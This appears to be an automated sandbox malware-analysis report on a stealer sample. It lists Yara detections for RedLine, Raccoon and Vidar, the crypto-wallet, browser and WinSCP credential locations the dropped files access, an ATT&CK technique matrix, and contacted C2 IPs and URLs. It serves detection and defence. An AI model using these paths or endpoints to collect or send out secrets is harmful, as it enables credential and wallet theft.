Source: Yara match	File source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe, type: DROPPED

Yara detected CryptOne packer

Source: Yara match

File source: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Raccoon Stealer v2

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 23.2.kukurzka9000.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.kukurzka9000.exe.22b0174.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.F0geI.exe.5d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.F0geI.exe.5d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.F0geI.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.kukurzka9000.exe.22b0174.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.kukurzka9000.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.F0geI.exe.4c0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.F0geI.exe.4c0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.F0geI.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000003.362733607.0000000000520000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.327739164.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.369772118.0000000000520000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.449217008.000000000050B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.334532236.000000000054D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.333075740.0000000000523000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.346306423.0000000000521000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.382819718.0000000000520000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.368157732.000000000051E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.442092105.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.333063165.0000000000517000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.360540349.0000000000520000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.334542606.0000000000523000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar stealer

Source: Yara match	File source: Process Memory Space: real.exe PID: 8952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: brokerius.exe PID: 4472, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectrumE#
Source: real.exe, 0000001D.00000002.815261595.000000000129C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets\????*
Source: brokerius.exe, 00000021.00000002.787632512.000000000081A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: JaxxE#
Source: real.exe, 0000001D.00000002.790688757.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: real.exe, 0000001D.00000002.790688757.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: exodus.conf.json
Source: real.exe, 0000001D.00000002.815261595.000000000129C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\????le
Source: real.exe, 0000001D.00000002.815261595.000000000129C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\info.seco
Source: real.exe, 0000001D.00000002.790688757.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
Source: real.exe, 0000001D.00000002.815261595.000000000129C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\jaxx\Local Storage\file__0.localstorage
Source: real.exe, 0000001D.00000002.790688757.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: passphrase.json
Source: real.exe, 0000001D.00000002.790688757.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \\Ethereum\\
Source: WSkT8d093C.exe	String found in binary or memory: Exodus Web3 Wallet
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: EthereumE#
Source: real.exe, 0000001D.00000002.815261595.000000000129C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\jaxx\Local Storage\file__0.localstorage
Source: real.exe, 0000001D.00000002.790688757.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default_wallet
Source: real.exe, 0000001D.00000002.815261595.000000000129C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\????le
Source: real.exe, 0000001D.00000002.815261595.000000000129C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\MultiDoge\multidoge.wallet<
Source: real.exe, 0000001D.00000002.790688757.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: seed.seco
Source: real.exe, 0000001D.00000002.790688757.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: brokerius.exe, 00000021.00000002.787632512.000000000081A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Tries to steal Crypto Currency Wallets

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\????
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\????
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\????
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\????
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\????
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\????
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\????
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\????
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Program Files (x86)\Company\NewProduct\real.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Source: Yara match	File source: 00000025.00000002.788201136.00000000010EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.787632512.000000000081A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: namdoitntn.exe PID: 8632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: real.exe PID: 8952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: safert44.exe PID: 9112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jshainx.exe PID: 9184, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: brokerius.exe PID: 4472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ffnameedit.exe PID: 8164, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 26.0.namdoitntn.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.0.ffnameedit.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.0.jshainx.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.WSkT8d093C.exe.3adae14.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.WSkT8d093C.exe.3adae14.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000000.343257573.00000000002F2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.356865696.00000000003F3000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.272716591.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.371239903.0000000000153000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: namdoitntn.exe PID: 8632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: safert44.exe PID: 9112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jshainx.exe PID: 9184, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ffnameedit.exe PID: 8164, type: MEMORYSTR
Source: Yara match	File source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe, type: DROPPED

Yara detected CryptOne packer

Source: Yara match

File source: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Raccoon Stealer v2

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 23.2.kukurzka9000.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.kukurzka9000.exe.22b0174.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.F0geI.exe.5d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.F0geI.exe.5d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.F0geI.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.kukurzka9000.exe.22b0174.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.kukurzka9000.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.F0geI.exe.4c0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.F0geI.exe.4c0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.F0geI.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000003.362733607.0000000000520000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.327739164.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.369772118.0000000000520000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.449217008.000000000050B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.334532236.000000000054D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.333075740.0000000000523000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.346306423.0000000000521000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.382819718.0000000000520000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.368157732.000000000051E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.442092105.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.333063165.0000000000517000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.360540349.0000000000520000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.334542606.0000000000523000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar stealer

Source: Yara match	File source: Process Memory Space: real.exe PID: 8952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: brokerius.exe PID: 4472, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Windows Management Instrumentation	1 Scheduled Task/Job	11 Process Injection	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	13 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	2 Native API	1 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	111 Deobfuscate/Decode Files or Information	1 Input Capture	1 Account Discovery	Remote Desktop Protocol	3 Data from Local System	Exfiltration Over Bluetooth	22 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Scheduled Task/Job	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	131 Obfuscated Files or Information	1 Credentials in Registry	4 File and Directory Discovery	SMB/Windows Admin Shares	1 Input Capture	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	1 PowerShell	Logon Script (Mac)	Logon Script (Mac)	32 Software Packing	NTDS	54 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	4 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	221 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	115 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	3 Masquerading	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	12 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 Application Window Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Rundll32	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	1 Remote System Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
WSkT8d093C.exe	48%	Virustotal		Browse
WSkT8d093C.exe	64%	ReversingLabs	Win32.Ransomware.StopCrypt
WSkT8d093C.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	100%	Avira	HEUR/AGEN.1251247
C:\Program Files (x86)\Company\NewProduct\safert44.exe	100%	Avira	HEUR/AGEN.1203016
C:\Program Files (x86)\Company\NewProduct\WW1.exe	100%	Avira	HEUR/AGEN.1250598
C:\Program Files (x86)\Company\NewProduct\brokerius.exe	100%	Avira	HEUR/AGEN.1250598
C:\Program Files (x86)\Company\NewProduct\real.exe	100%	Avira	HEUR/AGEN.1210243
C:\Program Files (x86)\Company\NewProduct\jshainx.exe	100%	Avira	HEUR/AGEN.1251247
C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	100%	Avira	HEUR/AGEN.1251247
C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Company\NewProduct\safert44.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Company\NewProduct\WW1.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Company\NewProduct\brokerius.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Company\NewProduct\real.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Company\NewProduct\F0geI.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Company\NewProduct\jshainx.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Company\NewProduct\F0geI.exe	64%	Metadefender		Browse
C:\Program Files (x86)\Company\NewProduct\F0geI.exe	96%	ReversingLabs	Win32.Ransomware.StopCrypt

Unpacked PE Files

Source	Detection	Scanner	Label	Download
37.0.WW1.exe.12a0000.0.unpack	100%	Avira	HEUR/AGEN.1250598	Download File
1.3.WSkT8d093C.exe.3af5a14.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
26.0.namdoitntn.exe.2f0000.0.unpack	100%	Avira	HEUR/AGEN.1251247	Download File
36.0.ffnameedit.exe.140000.0.unpack	100%	Avira	HEUR/AGEN.1234957	Download File
29.0.real.exe.fc0000.0.unpack	100%	Avira	HEUR/AGEN.1210243	Download File
31.0.jshainx.exe.3e0000.0.unpack	100%	Avira	HEUR/AGEN.1234957	Download File
33.0.brokerius.exe.ce0000.0.unpack	100%	Avira	HEUR/AGEN.1250598	Download File
33.2.brokerius.exe.ce0000.0.unpack	100%	Avira	HEUR/AGEN.1250598	Download File
23.2.kukurzka9000.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
37.2.WW1.exe.12a0000.0.unpack	100%	Avira	HEUR/AGEN.1250598	Download File
20.2.F0geI.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
29.2.real.exe.fc0000.0.unpack	100%	Avira	HEUR/AGEN.1250598	Download File
30.0.safert44.exe.c90000.0.unpack	100%	Avira	HEUR/AGEN.1203016	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://135.181.104.248:80/0586872789.zipc	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id12Response	0%	URL Reputation	safe
http://tempuri.org/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id2Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id21Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id15Response	0%	URL Reputation	safe
http://135.181.104.248/0586872789.zipowsp	0%	Avira URL Cloud	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
http://tempuri.org/Entity/Id24Response	0%	URL Reputation	safe
http://ctldl.windowsup/1571	0%	Avira URL Cloud	safe
http://62.204.41.126:80	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id5Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id10Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id8Response	0%	URL Reputation	safe
http://62.204.41.126:801170NULL%s	0%	Avira URL Cloud	safe
https://cutt.ly	0%	Avira URL Cloud	safe
http://135.181.104.248/1571	100%	Avira URL Cloud	malware
http://135.181.104.248/.	0%	Avira URL Cloud	safe
http://135.181.104.248/0	0%	Avira URL Cloud	safe
http://135.181.104.248/)	0%	Avira URL Cloud	safe
https://mas.to/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id13Response	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
cutt.ly	104.22.1.232	true	false	high
accounts.google.com	142.250.180.141	true	false	high
t.me	149.154.167.99	true	false	high
cdn.discordapp.com	162.159.133.233	true	false	high
iplogger.org	148.251.234.83	true	false	high
www.google.com	142.251.209.4	true	false	high
clients.l.google.com	142.251.209.46	true	false	high
insttaller.com	185.191.229.101	true	false	high
dns.google	8.8.4.4	true	false	high
clients2.google.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://iplogger.org/1AFmX4	false		high
http://135.181.104.248/1571	true	Avira URL Cloud: malware	unknown
https://iplogger.org/1AJmX4	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	namdoitntn.exe, 0000001A.00000002.876305445.0000000002733000.00000004.00000800.00020000.00000000.sdmp, real.exe, 0000001D.00000003.415474239.000000001026B000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.877046785.000000000335A000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.876098932.0000000002A38000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.872582969.00000000026A6000.00000004.00000800.00020000.00000000.sdmp, Np8Ya6aNEbkh.20.dr	false		high
https://iplogger.org/1AVmX41AVmX4	65360530329811159659501815.29.dr, 59095662396535248957003083.29.dr	false		high
http://135.181.104.248:80/0586872789.zipc	real.exe, 0000001D.00000003.406525655.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, real.exe, 0000001D.00000003.415554897.00000000012B8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	Np8Ya6aNEbkh.20.dr	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultL	jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://iplogger.org/1AJmX4	real.exe, 0000001D.00000003.406219338.0000000010274000.00000004.00000800.00020000.00000000.sdmp, WSkT8d093C.exe, 65360530329811159659501815.29.dr, 59095662396535248957003083.29.dr	false		high
http://tempuri.org/Entity/Id12Response	namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.google	real.exe, 0000001D.00000003.406128336.0000000010269000.00000004.00000800.00020000.00000000.sdmp, 65360530329811159659501815.29.dr, 59095662396535248957003083.29.dr	false		high
